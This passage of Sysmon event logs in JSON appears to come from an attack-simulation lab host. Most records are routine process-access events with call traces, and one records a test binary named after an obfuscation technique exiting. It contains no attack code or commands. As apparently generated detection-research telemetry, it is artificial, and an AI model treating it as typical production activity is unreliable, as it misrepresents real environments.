{A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":5,"OpcodeValue":0,"RecordNumber":5331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process terminated:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.656\r\nProcessGuid: {A837DB8D-032D-5F25-0000-0010A2490A00}\r\nProcessId: 3288\r\nImage: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","Category":"Process terminated (rule: ProcessTerminate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.656","ProcessGuid":"{A837DB8D-032D-5F25-0000-0010A2490A00}","Image":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\nt